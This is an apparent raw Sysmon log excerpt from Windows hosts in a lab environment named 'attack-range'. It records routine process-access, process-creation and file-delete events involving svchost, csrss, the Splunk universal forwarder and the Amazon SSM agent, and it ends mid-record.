11:10:47.103{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220336Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:47.103{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220335Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:47.103{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220334Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:47.103{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220333Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:47.103{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220332Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:47.103{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220331Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:47.103{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220330Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:47.103{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-1637-6216-E704-000000003902}2408C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000220329Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:47.103{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1637-6216-E704-000000003902}2408C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000220328Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:47.104{4F8D34B0-1637-6216-E704-000000003902}2408C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000296311Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:47.180{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\surveyor-20220223083249-154MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296313Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:48.393{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=62473FBB3D82F5DBC99BB5C1190DAD85,SHA256=CE32F250335995F716AC9CAACD6BE5B9720CDF6B7AB9B830160F3CD6A72D970F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220356Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:48.227{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=79FFA73A2AC4A41111B481DBB2D20D48,SHA256=5E9068973D4BEC779DB894F73DF0541105B5CA5F45B9B3BC0DF9A56B4013A43B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220355Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:48.227{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A0DC0439180B886D97C35CC6E41775E4,SHA256=7648621509C4707F62D3EE05C157361160D97F37778D9A45F14FE7E473390806,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296314Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:49.408{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=09512359DB2EFE285CD8DB46B1C2AEEB,SHA256=5F401EDC01988FC666905ACC1070445B21B4054845E9C8F70D2B55A04D5197B4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000220386Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:49.759{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1639-6216-EA04-000000003902}3160C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220385Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:49.759{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220384Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:49.759{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220383Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:49.759{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220382Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:49.759{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220381Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:49.759{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220380Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:49.759{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220379Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:49.759{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220378Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:49.759{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220377Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:49.759{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220376Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:49.759{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-1639-6216-EA04-000000003902}3160C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000220375Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:49.759{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1639-6216-EA04-000000003902}3160C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000220374Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:49.760{4F8D34B0-1639-6216-EA04-000000003902}3160C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000220373Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:49.556{4F8D34B0-1639-6216-E904-000000003902}26483408C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program 